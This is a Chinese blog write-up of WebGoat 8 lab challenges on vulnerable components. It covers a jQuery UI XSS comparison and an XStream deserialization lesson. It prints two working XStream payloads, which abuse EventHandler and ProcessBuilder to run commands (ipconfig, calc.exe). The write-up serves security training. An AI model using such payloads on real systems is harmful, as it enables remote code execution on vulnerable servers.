2021-09-24

webgoat 8 通关A9:vulnerable components

最近在做webgoat8 的通关,记录一下感觉比较有意思(花时间最长)的一关

一、lesson 5

这个没什么好说的,xxs攻击里,告诉我们有的组件可以被黑客简单的攻击,有的组件却不可以。
在这里插入图片描述
jquery-ui:1.10.4这个版本的组件有xxs漏洞,点击按钮,可以看到有弹框。在这里插入图片描述
jquery-ui:1.12.0这个版本的组件没有这个漏洞,点击按钮不会出现弹框。
在这里插入图片描述

二、lesson 12

1.破解的辛酸史

一开始都没有看懂这个题目的具体要求,于是打开了百度,直接搜。看到网上的payload大概明白了要干什么。写一个payload当Contact里面任何一个方法就会执行payload。网上白嫖的一个payload,当时就很疑惑为什么是在java.lang.Comparable下面。

<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>ipconfig</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>

没想这么多,先提交进去试一试,错了。。一直说我的payload无法反序列化。。。
在这里插入图片描述
然后傻傻的我就一头钻进解决这个不能反序列化的牛角尖里。花费了一整天的时间,毫无进展。第二天我打开源码看了看,并没有什么特别的啊。但是看到了一个网址https://x-stream.github.io/CVE-2013-7285.html
于是就点进去看看。

2.终于找到出路

点进去这个页面,敏锐的我一眼看到了
在这里插入图片描述

<contact class='dynamic-proxy'>
  <interface>org.company.model.Contact</interface>
  <handler class='java.beans.EventHandler'>
    <target class='java.lang.ProcessBuilder'>
      <command>
        <string>calc.exe</string>
      </command>
    </target>
    <action>start</action>
  </handler>
</contact>

贴到webgoat里面,还是报错仔细一看接口的包名没写对,替换成webgoat要求的包名。
在这里插入图片描述
点击提,弹出计算机的窗口,成功破解。
在这里插入图片描述
目前整个的通关已经写完,有时间还会写其他部分的通关攻略。

  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值